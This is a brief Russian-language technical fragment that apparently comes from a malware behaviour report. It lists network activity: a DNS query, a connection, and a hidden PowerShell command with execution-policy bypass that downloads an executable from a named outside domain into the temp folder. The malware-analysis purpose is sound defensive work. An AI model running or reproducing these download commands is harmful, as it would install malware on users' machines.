Техническая информация
- http://rotwdns.com/followup/uop/c5162b19bf3ebf2a8a89170a1b9c94dca81b2.exe как %temp%\\anyfilename.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://rotwdns.com/followup/uop/c5162b19bf3ebf2a8a89170a1b9c94dca81b2.exe','%TEMP%\\anyFileName.exe')...
- 'ro##dns.com':80
- http://ro##dns.com/followup/uop/c5162b19bf3ebf2a8a89170a1b9c94dca81b2.exe
- DNS ASK ro##dns.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://rotwdns.com/followup/uop/c5162b19bf3ebf2a8a89170a1b9c94dca81b2.exe','%TEMP%\\anyFileName.exe')...' (со скрытым окном)